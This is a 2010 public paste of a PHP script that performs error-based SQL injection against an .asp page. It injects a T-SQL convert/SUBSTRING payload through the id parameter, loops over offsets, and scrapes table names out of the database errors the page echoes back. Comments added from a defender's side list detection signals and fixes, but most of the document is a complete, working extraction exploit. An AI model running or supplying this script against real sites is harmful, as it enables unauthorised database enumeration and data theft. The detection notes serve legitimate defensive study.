
Untitled

a guest
May 10th, 2010
<?php
// Reference sample (public paste) of an error-based SQL injection probe against
// an .asp page backed by an SQL Server-style database (T-SQL `convert`,
// `FOR XML RAW`, `nvarchar` in the error text). It makes the backend convert a
// string of table names to int and reads the names back out of the database
// error that the page echoes into its HTML. Annotated from the defender's
// side: what the traffic looks like and which controls make it fail.
//
// Signals worth a detection rule:
//   - GET /index.asp with id=1' followed by a URL-encoded "and 1= (SELECT
//     convert(int,SUBSTRING(... FOR XML RAW ...)))--" tail
//   - a burst of near-identical requests that differ only in the SUBSTRING
//     offset (1990-byte steps, see the for header below)
//   - response bodies containing raw driver text such as
//     "the nvarchar value '...' to data type int" or "type mismatch"
// Controls that break it: parameterise the `id` lookup so the quote in id=1'
// never reaches the SQL text, and replace the echoed driver error with a
// generic error page — the loop below depends entirely on that echoed text and
// exits on the first response that lacks it.

$host = "www.test.net";
$port = 80;

// $i is the SUBSTRING start offset (advances 1990 per request); $j only counts
// requests. There is no loop condition: the only exits are the two `break`s
// below (error text absent, or a 'type mismatch' reply) and the `return` on a
// failed connect.
for($i=$j=0;;$i+=1990,$j++) {
    // Raw HTTP/1.0 request built by hand; the injected clause is URL-encoded
    // and appended directly after the closing quote in id=1'.
    $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
    $p.= "Host: $host\r\n";
    $p.= "Connection: close\r\n\r\n";

    // One fresh TCP connection per window. A top-level `return` ends the whole
    // script (or the including file) silently — nothing is reported.
    $ock = fsockopen(gethostbyname($host), $port);
    if(!$ock) {
        return false;
    }
    fputs($ock, $p);
    // Read until the server closes the connection (Connection: close above).
    $html='';
    while(!feof($ock)) {
        $html.= fgets($ock);
    }
    // Split headers from body on the first blank line; $html[1] is the body
    // and is undefined if the response carried no "\r\n\r\n" separator.
    $html = explode("\r\n\r\n",$html);
    // A 'type mismatch' reply is treated as end of data.
    if(stripos($html[1],'type mismatch')!==false) {
        break;
    }
    // Scrape the value the database failed to convert out of the echoed error
    // message; capture group 1 is the leaked XML fragment.
    $out = array();
    preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
    if(isset($out[1])) {
        // $xml is never initialised before the loop; PHP treats the first
        // append as "" and emits an undefined-variable notice/warning.
        $xml .= htmlspecialchars_decode($out[1]);
    } else {
        // No error text in the body: the page is no longer echoing the driver
        // message (e.g. a generic error page). Stop.
        break;
    }

}

// Reassemble the leaked fragments as XML and print one attribute per element.
// '<root>' is never closed and the parse return value is not checked, so a
// truncated or malformed fragment set goes unnoticed here.
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml, $out);
foreach($out as $el) {
    // NOTE(review): the SQL alias is `e` but the key read here is 'E',
    // presumably because the parser's default case folding upper-cases names —
    // confirm against xml_parser_set_option.
    echo $el['attributes']['E']."\r\n";
}